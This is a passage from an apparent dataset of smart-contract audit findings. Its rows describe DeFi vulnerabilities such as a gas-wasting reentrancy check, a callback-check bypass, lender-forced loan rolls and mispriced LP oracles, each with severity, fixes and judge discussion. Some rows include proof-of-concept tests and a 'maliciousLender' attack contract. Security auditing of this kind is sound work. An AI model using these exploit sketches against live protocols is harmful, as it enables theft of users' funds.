address(flashParams.baseAsset)) {\\n // @audit should be `tokenInBalanceAfter - tokenInBalanceBefore` given to `_handleRebalanceIn`\\n (uint256 debtDecreaseIn, uint256 debtIncreaseIn) =\\n _handleRebalanceIn(destInfoIn, dvIn, params.tokenIn, tokenInBalanceAfter);\\n idleDebtChange.debtDecrease += debtDecreaseIn;\\n idleDebtChange.debtIncrease += debtIncreaseIn;\\n } else {\\n idleDebtChange.idleIncrease += tokenInBalanceAfter - tokenInBalanceBefore;\\n }\\n }\\n // rest of code\\n}\\n```\\n" +OOG / unexpected reverts due to incorrect usage of staticcall.,medium,"The function `checkReentrancy` in `BalancerUtilities.sol` is used to check if the balancer contract has been re-entered or not. It does this by doing a `staticcall` on the pool contract and checking the return value. 
According to the solidity docs, if a `staticcall` encounters a state change, it burns up all gas and returns. The `checkReentrancy` tries to call `manageUserBalance` on the vault contract, and returns if it finds a state change.\\nThe issue is that this burns up all the gas sent with the call. According to EIP150, a call gets allocated 63/64 bits of the gas, and the entire 63/64 parts of the gas is burnt up after the staticcall, since the staticcall will always encounter a storage change. This is also highlighted in the balancer monorepo, which has guidelines on how to check re-entrancy here.\\nThis can also be shown with a simple POC.\\n```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n 
emit log_named_uint(""Gas before price1"", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(""price1"", price1);\\n emit log_named_uint(""Gas after price1 "", gasleft());\\n }\\n```\\n\\nThe oracle is called to get a price. This oracle calls the `checkReentrancy` function and burns up the gas. The gas left is checked before and after this call.\\nThe output shows this:\\n```\\n[PASS] testAttack() (gas: 9203730962297323943)\\nLogs:\\nGas before price1: 9223372036854745204\\nprice1: 1006294352158612428\\nGas after price1 : 425625349158468958\\n```\\n\\nThis shows that 96% of the gas sent is burnt up in the oracle call.","According to the monorepo here, the staticall must be allocated a fixed amount of gas. Change the reentrancy check to the following.\\n```\\n(, bytes memory revertData) = address(vault).staticcall{ gas: 10_000 }(\\n abi.encodeWithSelector(vault.manageUserBalance.selector, 0)\\n );\\n```\\n\\nThis ensures gas isn't burnt up without reason.","This causes the contract to burn up 63/64 bits of gas in a single check. If there are lots of operations after this call, the call can revert due to running out of gas. This can lead to a DOS of the contract.\\nCurrent opinion is to reject escalation and keep issue medium severity.\\nJeffCX\\nPutting a limit on the gas is not a task for the protocol\\nsir, please read the report again, the flawed logic in the code charge user 100x gas in every transaction in every withdrawal\\nin a single transaction, the cost burnt can by minimal\\nidk how do state it more clearly, emm if you put money in the bank, you expect to pay 1 USD for withdrawal transaction fee, but every time you have to pay 100 USD withdrawal fee because of the bug\\nthis cause loss of fund for every user in every transaction for not only you but every user...\\nEvert0x\\n@JeffCX what are the exact numbers on the withdrawal costs? E.g. if I want to withdraw $10k, how much gas can I expect to pay? 
If this is a significant amount I can see the argument for\\nHow to identify a high issue: Definite loss of funds without limiting external conditions.\\nBut it's not clear how much this will be assuming current mainnet conditions.\\nJeffCX\\nI write a simpe POC\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""forge-std/console.sol"";\\n\\nimport ""@openzeppelin/contracts/token/ERC20/ERC20.sol"";\\n\\ncontract MockERC20 is ERC20 {\\n constructor()ERC20(""MyToken"", ""MTK"")\\n {}\\n\\n function mint(address to, uint256 amount) public {\\n _mint(to, amount);\\n }\\n}\\n\\ninterface ICheckRetrancy {\\n function checkRentrancy() external;\\n}\\n\\ncontract RentrancyCheck {\\n\\n\\n uint256 state = 10;\\n\\n function checkRentrancy() external {\\n address(this).staticcall(abi.encodeWithSignature(""hihi()""));\\n }\\n\\n function hihi() public {\\n state = 11;\\n }\\n\\n}\\n\\ncontract Vault {\\n\\n address balancerAddr;\\n bool checkRentrancy;\\n\\n constructor(bool _checkRentrancy, address _balancerAddr) {\\n checkRentrancy = _checkRentrancy;\\n balancerAddr = _balancerAddr;\\n }\\n\\n function toggleCheck(bool _state) public {\\n checkRentrancy = _state;\\n }\\n\\n function withdraw(address token, uint256 amount) public {\\n\\n if(checkRentrancy) {\\n ICheckRetrancy(balancerAddr).checkRentrancy();\\n }\\n\\n IERC20(token).transfer(msg.sender, amount);\\n \\n }\\n\\n}\\n\\n\\ncontract CounterTest is Test {\\n\\n using stdStorage for StdStorage;\\n StdStorage stdlib;\\n\\n MockERC20 token;\\n Vault vault;\\n RentrancyCheck rentrancyCheck;\\n\\n address user = vm.addr(5201314);\\n\\n function setUp() public {\\n \\n token = new MockERC20();\\n rentrancyCheck = new RentrancyCheck();\\n vault = new Vault(false, address(rentrancyCheck));\\n token.mint(address(vault), 100000000 ether);\\n\\n vm.deal(user, 100 ether);\\n \\n // vault.toggleCheck(true);\\n\\n }\\n\\n function testPOC() public {\\n\\n 
uint256 gas = gasleft();\\n uint256 amount = 100 ether;\\n vault.withdraw(address(token), amount);\\n console.log(gas - gasleft());\\n\\n }\\n\\n}\\n```\\n\\nthe call is\\n```\\nif check reentrancy flag is true\\n\\nuser withdraw -> \\ncheck reentrancy staticall revert and consume most of the gas \\n-> withdraw completed\\n```\\n\\nor\\n```\\nif check reentrancy flag is false\\n\\nuser withdraw ->\\n-> withdraw completed\\n```\\n\\nnote first we do not check the reentrancy\\n```\\n// vault.toggleCheck(true);\\n```\\n\\nwe run\\nthe gas cost is 42335\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 45438)\\nLogs:\\n 42335\\n```\\n\\nthen we uncomment the vault.toggleCheck(true) and check the reentrancy that revert in staticcall\\n```\\nvault.toggleCheck(true);\\n```\\n\\nwe run the same test again, this is the output, as we can see the gas cost surge\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 9554791)\\nLogs:\\n 9551688\\n```\\n\\nthen we can use this python scirpt to estimate how much gas is overpaid as lost of fund\\n```\\nregular = 42313\\n\\noverpaid = 9551666\\n\\n\\ncost = 0.000000045 * (overpaid - regular);\\n\\nprint(cost)\\n```\\n\\nthe cost is\\n```\\n0.427920885 ETH\\n```\\n\\nin a single withdraw, assume user lost 0.427 ETH,\\nif 500 user withdraw 20 times each and the total number of transaction is 10000\\nthe lose on gas is 10000 * 0.427 ETH\\nJeffCX\\nnote that the more gas limit user set, the more fund user lose in gas\\nbut we are interested in what the lowest amount of gas limit user that user can set the pay for withdrawal transaction\\nI did some fuzzing\\nthat number is 1800000 unit of gas\\nthe command to run the test is\\nsetting gas limit lower than 1800000 unit of gas is likely to revert in out of gas\\nunder this setting, the overpaid transaction cost is 1730089\\n```\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] testPOC() (gas: 1733192)\\nLogs:\\n 
1730089\\n```\\n\\nin other words,\\nin each withdrawal for every user, user can lose 0.073 ETH, (1730089 uint of gas * 45 gwei -> 0.000000045 ETH)\\nassume there are 1000 user, each withdraw 10 times, they make 1000 * 10 = 100_00 transaction\\nso the total lost is 100_00 * 0.07 = 700 ETH\\nin reality the gas is more than that because user may use more than 1800000 unit of gas to finalize the withdrawal transaction\\nEvert0x\\n@JeffCX thanks for putting in the effort to make this estimation.\\nBut as far as I can see, your estimation doesn't use the actual contracts in scope. But maybe that's irrelevant to make your point.\\nThis seems like the key sentence\\nin each withdrawal for every user, user can lose 0.073 ETH,\\nThis is an extra $100-$150 dollars per withdrawal action.\\nThis is not a very significant amount in my opinion. I assume an optimized withdrawal transaction will cost between $20-$50. So the difference is not as big.\\nJeffCX\\nSir, I don't think the method A and method B example applies in the codebase and in this issue\\nthere is only one method for user to withdraw share from the vault\\nI can add more detail to explain how this impact withdraw using top-down approach\\nUser can withdraw by calling withdraw in LMPVault.sol and triggers _withdraw\\nthe _withdraw calls the method _calcUserWithdrawSharesToBurn\\nthis calls LMPDebt._calcUserWithdrawSharesToBurn\\nwe need to know the debt value by calling destVault.debtValue\\nthis calls this line of code\\nthis calls the oracle code\\n`uint256 price = _systemRegistry.rootPriceOracle().getPriceInEth(_underlying);`\\nthen if the dest vault is the balancer vault, balancer reetrancy check is triggered to waste 63 / 64 waste in oracle code\\nso there is no function A and function B call\\nas long as user can withdraw and wants to withdraw share from balancer vault, 100x gas overpayment is required\\nthe POC is a simplified flow of this\\nit is ok to disagree sir:)\\nEvert0x\\nResult: Medium Has 
Duplicates\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nJEFFCX: rejected","```\\nunction testAttack() public {\\n mockRootPrice(WSTETH, 1_123_300_000_000_000_000); //wstETH\\n mockRootPrice(CBETH, 1_034_300_000_000_000_000); //cbETH\\n\\n IBalancerMetaStablePool pool = IBalancerMetaStablePool(WSTETH_CBETH_POOL);\\n\\n address[] memory assets = new address[](2);\\n assets[0] = WSTETH;\\n assets[1] = CBETH;\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 10_000 ether;\\n amounts[1] = 0;\\n\\n IBalancerVault.JoinPoolRequest memory joinRequest = IBalancerVault.JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: amounts, // maxAmountsIn,\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n ),\\n fromInternalBalance: false\\n });\\n\\n IBalancerVault.SingleSwap memory swapRequest = IBalancerVault.SingleSwap({\\n poolId: 0x9c6d47ff73e0f5e51be5fd53236e3f595c5793f200020000000000000000042c,\\n kind: IBalancerVault.SwapKind.GIVEN_IN,\\n assetIn: WSTETH,\\n assetOut: CBETH,\\n amount: amounts[0],\\n userData: abi.encode(\\n IBalancerVault.JoinKind.EXACT_TOKENS_IN_FOR_BPT_OUT,\\n amounts, //maxAmountsIn,\\n 0\\n )\\n });\\n\\n IBalancerVault.FundManagement memory funds = IBalancerVault.FundManagement({\\n sender: address(this),\\n fromInternalBalance: false,\\n recipient: payable(address(this)),\\n toInternalBalance: false\\n });\\n\\n emit log_named_uint(""Gas before price1"", gasleft());\\n uint256 price1 = oracle.getPriceInEth(WSTETH_CBETH_POOL);\\n emit log_named_uint(""price1"", price1);\\n emit log_named_uint(""Gas after price1 "", gasleft());\\n }\\n```\\n" +Slashing during `LSTCalculatorBase.sol` deployment can show bad apr for months,medium,"The contract `LSTCalculatorBase.sol` has some functions to calculate the rough APR expected from a liquid staking token. 
The contract is first deployed, and the first snapshot is taken after `APR_FILTER_INIT_INTERVAL_IN_SEC`, which is 9 days. It then calculates the APR between the deployment and this first snapshot, and uses that to initialize the APR value. It uses the function `calculateAnnualizedChangeMinZero` to do this calculation.\\nThe issue is that the function `calculateAnnualizedChangeMinZero` has a floor of 0. So if the backing of the LST decreases over that 9 days due to a slashing event in that interval, this function will return 0, and the initial APR and `baseApr` will be set to 0.\\nThe calculator is designed to update the APR at regular intervals of 3 days. However, the new apr is given a weight of 10% and the older apr is given a weight of 90% as seen below.\\n```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n\\nAnd alpha is hardcoded to 0.1. So if the initial APR starts at 0 due to a slashing event in the initial 9 day period, a large number of updates will be required to bring the APR up to the correct value.\\nAssuming the correct APR of 6%, and an initial APR of 0%, we can calculate that it takes upto 28 updates to reflect close the correct APR. This transaltes to 84 days. So the wrong APR cann be shown for upto 3 months. Tha protocol uses these APR values to justify the allocation to the various protocols. Thus a wrong APR for months would mean the protocol would sub optimally allocate funds for months, losing potential yield.","It is recommended to initialize the APR with a specified value, rather than calculate it over the initial 9 days. 
9 day window is not good enough to get an accurate APR, and can be easily manipulated by a slashing event.",The protocol can underperform for months due to slashing events messing up APR calculations close to deployment date.,```\\nreturn ((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18;\\n```\\n +curve admin can drain pool via reentrancy (equal to execute emergency withdraw and rug tokenmak fund by third party),medium,"A few curve liquidity is pool is well in-scope:\\n```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n\\none of the pool is 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nAdmin of curve pools can easily drain curve pools via reentrancy or via the `withdraw_admin_fees` function.\\n```\\n@external\\ndef withdraw_admin_fees():\\n receiver: address = Factory(self.factory).get_fee_receiver(self)\\n\\n amount: uint256 = self.admin_balances[0]\\n if amount != 0:\\n raw_call(receiver, b"""", value=amount)\\n\\n amount = self.admin_balances[1]\\n if amount != 0:\\n assert ERC20(self.coins[1]).transfer(receiver, amount, default_return_value=True)\\n\\n self.admin_balances = empty(uint256[N_COINS])\\n```\\n\\nif admin of the curve can set a receiver to a malicious smart contract and reenter withdraw_admin_fees a 1000 times to drain the pool even the admin_balances is 
small\\nthe line of code\\n```\\nraw_call(receiver, b"""", value=amount)\\n```\\n\\ntriggers the reentrancy\\nThis is a problem because as stated by the tokemak team:\\nIn case of external protocol integrations, are the risks of external contracts pausing or executing an emergency withdrawal acceptable? If not, Watsons will submit issues related to these situations that can harm your protocol's functionality.\\nPausing or emergency withdrawals are not acceptable for Tokemak.\\nAs you can see above, pausing or emergency withdrawals are not acceptable, and this is possible for curve pools so this is a valid issue according to the protocol and according to the README",N/A,curve admins can drain pool via reentrancy,```\\nCurve Pools\\n\\nCurve stETH/ETH: 0x06325440D014e39736583c165C2963BA99fAf14E\\nCurve stETH/ETH ng: 0x21E27a5E5513D6e65C4f830167390997aA84843a\\nCurve stETH/ETH concentrated: 0x828b154032950C8ff7CF8085D841723Db2696056\\nCurve stETH/frxETH: 0x4d9f9D15101EEC665F77210cB999639f760F831E\\nCurve rETH/ETH: 0x6c38cE8984a890F5e46e6dF6117C26b3F1EcfC9C\\nCurve rETH/wstETH: 0x447Ddd4960d9fdBF6af9a790560d0AF76795CB08\\nCurve rETH/frxETH: 0xbA6c373992AD8ec1f7520E5878E5540Eb36DeBf1\\nCurve cbETH/ETH: 0x5b6C539b224014A09B3388e51CaAA8e354c959C8\\nCurve cbETH/frxETH: 0x548E063CE6F3BaC31457E4f5b4e2345286274257\\nCurve frxETH/ETH: 0xf43211935C781D5ca1a41d2041F397B8A7366C7A\\nCurve swETH/frxETH: 0xe49AdDc2D1A131c6b8145F0EBa1C946B7198e0BA\\n```\\n +"At claimDefaulted, the lender may not receive the token because the Unclaimed token is not processed",high,"```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n\\nLoan data is deleted in the `claimDefaulted` function. `loan.unclaimed` is not checked before the data is deleted. 
So, if `claimDefaulted` is called while there are unclaimed tokens, the lender will not be able to get the unclaimed tokens.","Process unclaimed tokens before deleting loan data.\\n```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n// Add the line below\\n claimRepaid(loanID_)\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n",Lender cannot get unclaimed token.,"```\\nfunction claimDefaulted(uint256 loanID_) external returns (uint256, uint256, uint256) {\\n Loan memory loan = loans[loanID_];\\n delete loans[loanID_];\\n```\\n" +isCoolerCallback can be bypassed,high,"The `CoolerCallback.isCoolerCallback()` is intended to ensure that the lender implements the `CoolerCallback` abstract at line 241 when the parameter `isCallback_` is `true`.\\n```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. 
\\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n\\nHowever, this function doesn't provide any protection. The lender can bypass this check without implementing the `CoolerCallback` abstract by calling the `Cooler.clearRequest()` function using a contract that implements the `isCoolerCallback()` function and returns a `true` value.\\nFor example:\\n```\\ncontract maliciousLender {\\n function isCoolerCallback() pure returns(bool) {\\n return true;\\n }\\n \\n function operation(\\n address _to,\\n uint256 reqID_\\n ) public {\\n Cooler(_to).clearRequest(reqID_, true, true);\\n }\\n \\n function onDefault(uint256 loanID_, uint256 debt, uint256 collateral) public {}\\n}\\n```\\n\\nBy being the `loan.lender` with implement only `onDefault()` function, this will cause the `repayLoan()` and `rollLoan()` methods to fail due to revert at `onRepay()` and `onRoll()` function. 
The borrower cannot repay and the loan will be defaulted.\\nAfter the loan default, the attacker can execute `claimDefault()` to claim the collateral.\\nFurthermore, there is another method that allows lenders to bypass the `CoolerCallback.isCoolerCallback()` function which is loan ownership transfer.\\n```\\n/// @notice Approve transfer of loan ownership rights to a new address.\\n/// @param to_ address to be approved.\\n/// @param loanID_ index of loan in loans[].\\nfunction approveTransfer(address to_, uint256 loanID_) external {\\n if (msg.sender != loans[loanID_].lender) revert OnlyApproved();\\n\\n // Update transfer approvals.\\n approvals[loanID_] = to_;\\n}\\n\\n/// @notice Execute loan ownership transfer. Must be previously approved by the lender.\\n/// @param loanID_ index of loan in loans[].\\nfunction transferOwnership(uint256 loanID_) external {\\n if (msg.sender != approvals[loanID_]) revert OnlyApproved();\\n\\n // Update the load lender.\\n loans[loanID_].lender = msg.sender;\\n // Clear transfer approvals.\\n approvals[loanID_] = address(0);\\n}\\n```\\n\\nNormally, the lender who implements the `CoolerCallback` abstract may call the `Cooler.clearRequest()` with the `_isCoolerCallback` parameter set to `true` to execute logic when a loan is repaid, rolled, or defaulted.\\nBut the lender needs to change the owner of the loan, so they call the `approveTransfer()` and `transferOwnership()` functions to the contract that doesn't implement the `CoolerCallback` abstract (or implement only `onDefault()` function to force the loan default), but the `loan.callback` flag is still set to `true`.\\nThus, this breaks the business logic since the three callback functions don't need to be implemented when the `isCoolerCallback()` is set to `true` according to the dev note in the `CoolerCallback` abstract below:\\n/// @notice Allows for debt issuers to execute logic when a loan is repaid, rolled, or defaulted. 
/// @dev The three callback functions must be implemented if `isCoolerCallback()` is set to true.","Only allowing callbacks from the protocol-trusted address (eg., `Clearinghouse` contract).\\nDisable the transfer owner of the loan when the `loan.callback` is set to `true`.","The lender forced the Loan become default to get the collateral token, owner lost the collateral token.\\nBypass the `isCoolerCallback` validation.","```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. \\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n" +`emergency_shutdown` role is not enough for emergency shutdown.,medium,"Let's examine the function emergencyShutdown():\\n```\\nfunction emergencyShutdown() external onlyRole(""emergency_shutdown"") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 
sdaiBalance = sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n\\nThis has the modifier `onlyRole(""emergency_shutdown"")`. However, this also calls function `defund()`, which has the modifier `onlyRole(""cooler_overseer"")`\\n```\\nfunction defund(ERC20 token_, uint256 amount_) public onlyRole(""cooler_overseer"") {\\n```\\n\\nTherefore, the role `emergency_shutdown` will not have the ability to shutdown the protocol, unless it also has the overseer role.\\nTo get a coded PoC, make the following modifications to the test case:\\n```\\n//rolesAdmin.grantRole(""cooler_overseer"", overseer);\\nrolesAdmin.grantRole(""emergency_shutdown"", overseer);\\n```\\n\\nRun the following test command (to just run a single test test_emergencyShutdown()):\\n```\\nforge test --match-test test_emergencyShutdown\\n```\\n\\nThe test will fail with the `ROLES_RequireRole()` error.","There are two ways to mitigate this issue:\\nSeparate the logic for emergency shutdown and defunding. i.e. 
do not defund on emergency shutdown, but rather defund separately after shutdown.\\nMove the defunding logic to a separate internal function, so that emergency shutdown function can directly call defunding without going through a modifier.",`emergency_shutdown` role cannot emergency shutdown the protocol,"```\\nfunction emergencyShutdown() external onlyRole(""emergency_shutdown"") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 sdaiBalance = sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n" +Lender is able to steal borrowers collateral by calling rollLoan with unfavourable terms on behalf of the borrower.,medium,"Say a user has 100 collateral tokens valued at $1,500 and they wish to borrow 1,000 debt tokens valued at $1,000 they would call: (values have been simplified for ease of math)\\n```\\nrequestLoan(""1,000 debt tokens"", ""5% interest"", ""10 loan tokens for each collateral"", ""1 year"")\\n```\\n\\nIf a lender then clears the request the borrower would expect to have 1 year to pay back 1,050 debt tokens to be able to receive their collateral back.\\nHowever a lender is able to call provideNewTermsForRoll with whatever terms they wish: i.e.\\n```\\nprovideNewTermsForRoll(""loanID"", ""10000000% interest"", ""1000 loan tokens for each collateral"" , ""1 year"")\\n```\\n\\nThey can then follow this up with a call to rollLoan(loanID): During the rollLoan function the interest is recalculated using:\\n```\\n function interestFor(uint256 amount_, uint256 rate_, uint256 duration_) public pure returns (uint256) {\\n uint256 interest = (rate_ * duration_) / 365 days;\\n return (amount_ * interest) / DECIMALS_INTEREST;\\n }\\n```\\n\\nAs rate_ & duration_ are controllable by the lender when they call provideNewTermsForRoll they can 
input a large number so that the amount returned is much larger than the value of the collateral. i.e. input a rate_ of amount * 3 and duration of 365 days so that the interestFor returns 3,000.\\nThis amount gets added to the existing loan.amount and would make it too costly to ever repay as the borrower would have to spend more than the collateral is worth to get it back. i.e. the borrower would now need to send 4,050 debt tokens to receive their $1,500 worth of collateral back instead of the expected 1050.\\nThe extra amount should result in more collateral needing to be sent however it is calculated using loan.request.loanToCollateral which is also controlled by the lender when they call provideNewTermsForRoll, allowing them to input a value that will result in newCollateralFor returning 0 and no new collateral needing to be sent.\\n```\\n function newCollateralFor(uint256 loanID_) public view returns (uint256) {\\n Loan memory loan = loans[loanID_];\\n // Accounts for all outstanding debt (borrowed amount + interest).\\n uint256 neededCollateral = collateralFor(loan.amount, loan.request.loanToCollateral); \\n // Lender can force neededCollateral to always be less than loan.collateral\\n\\n return neededCollateral > loan.collateral ? neededCollateral - loan.collateral : 0;\\n }\\n```\\n\\nAs a result a borrower who was expecting to have to repay 1050 tokens to get back their collateral may now need to spend many multiples more of that and will be forced to just forfeit their collateral to the lender.","Add a check restricting rollLoan to only be callable by the owner. 
i.e.:\\n```\\nfunction rollLoan(uint256 loanID_) external {\\n Loan memory loan = loans[loanID_];\\n \\n if (msg.sender != owner()) revert OnlyApproved();\\n```\\n\\nNote: unrelated but rollLoan is also missing its event should add:\\n```\\nfactory().newEvent(reqID_, CoolerFactory.Events.RollLoan, 0);\\n```\\n",Borrower will be forced to payback the loan at unfavourable terms or forfeit their collateral.,"```\\nrequestLoan(""1,000 debt tokens"", ""5% interest"", ""10 loan tokens for each collateral"", ""1 year"")\\n```\\n" +Stable BPT valuation is incorrect and can be exploited to cause protocol insolvency,high,"StableBPTOracle.sol#L48-L53\\n```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? price : minPrice;\\n }\\n return minPrice.mulWadDown(pool.getRate());\\n```\\n\\nThe above block is used to calculate the price. Finding the min price of all assets in the pool then multiplying by the current rate of the pool. This is nearly identical to how stable curve LP is priced. Balancer pools are a bit different and this methodology is incorrect for them. Lets look at a current mainnet pool to see the problem. Take the wstETH/aETHc pool. Currently getRate() = 1.006. The lowest price is aETHc at 2,073.23. This values the LP at 2,085.66. The issue is that the LPs actual value is 1,870.67 (nearly 12% overvalued) which can be checked here.\\nOvervaluing the LP as such can cause protocol insolvency as the borrower can overborrow against the LP, leaving the protocol with bad debt.",Stable BPT oracles need to use a new pricing methodology,Protocol insolvency due to overborrowing,```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? 
price : minPrice;\\n }\\n return minPrice.mulWadDown(pool.getRate());\\n```\\n +CurveTricryptoOracle#getPrice contains math error that causes LP to be priced completely wrong,high,"CurveTricryptoOracle.sol#L57-L62\\n```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n\\nAfter the LP price has been calculated in USD it is mistakenly divided by the price of ETH causing the contract to return the LP price in terms of ETH rather than USD. This leads to LP that is massively undervalued causing positions which are actually heavily over collateralized to be liquidated.",Don't divide the price by the price of ETH,Healthy positions are liquidated due to incorrect LP pricing,"```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n" +CVX/AURA distribution calculation is incorrect and will lead to loss of rewards at the end of each cliff,high,"WAuraPools.sol#L233-L248\\n```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n 